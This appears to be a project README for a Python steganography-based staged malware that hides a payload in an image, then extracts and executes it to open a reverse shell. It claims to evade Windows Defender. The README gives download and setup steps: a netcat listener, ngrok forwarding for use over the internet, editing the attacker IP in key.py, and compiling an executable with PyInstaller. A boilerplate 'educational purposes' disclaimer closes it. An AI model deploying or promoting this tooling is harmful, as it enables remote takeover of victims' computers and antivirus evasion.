Here is a simple python based staged malware which an attacker can use to hide the malicious code inside an image using an injector script using steganography. Finally extracting malware from image and executing it using a python script which finally gives us a reverse shell. The project is able to bypass the windows defender.
- [Download]
git clone https://github.com/Shauryae1337/Steganography-based-Staged-Malware - [Usage]
nc lnvp 5555On your Attacker Machine , you can also choose to do port forwarding when using over internet using ngrokngrok tcp 5555 - [Modifications]
Change the Attacker IP and Port in key.py
You can also compile an .exe using Pyinstaller
pip install pyinstallerand thenpyinstaller hoster.py. Make sure your image with malware and hoster.exe is in same directory. Refer the pdf file for more information
This project is intended for educational purposes only. Any use of this project for harmful or unethical purposes is strictly prohibited. The project creator(s) are not responsible for any misuse of the project.
Contact : [email protected]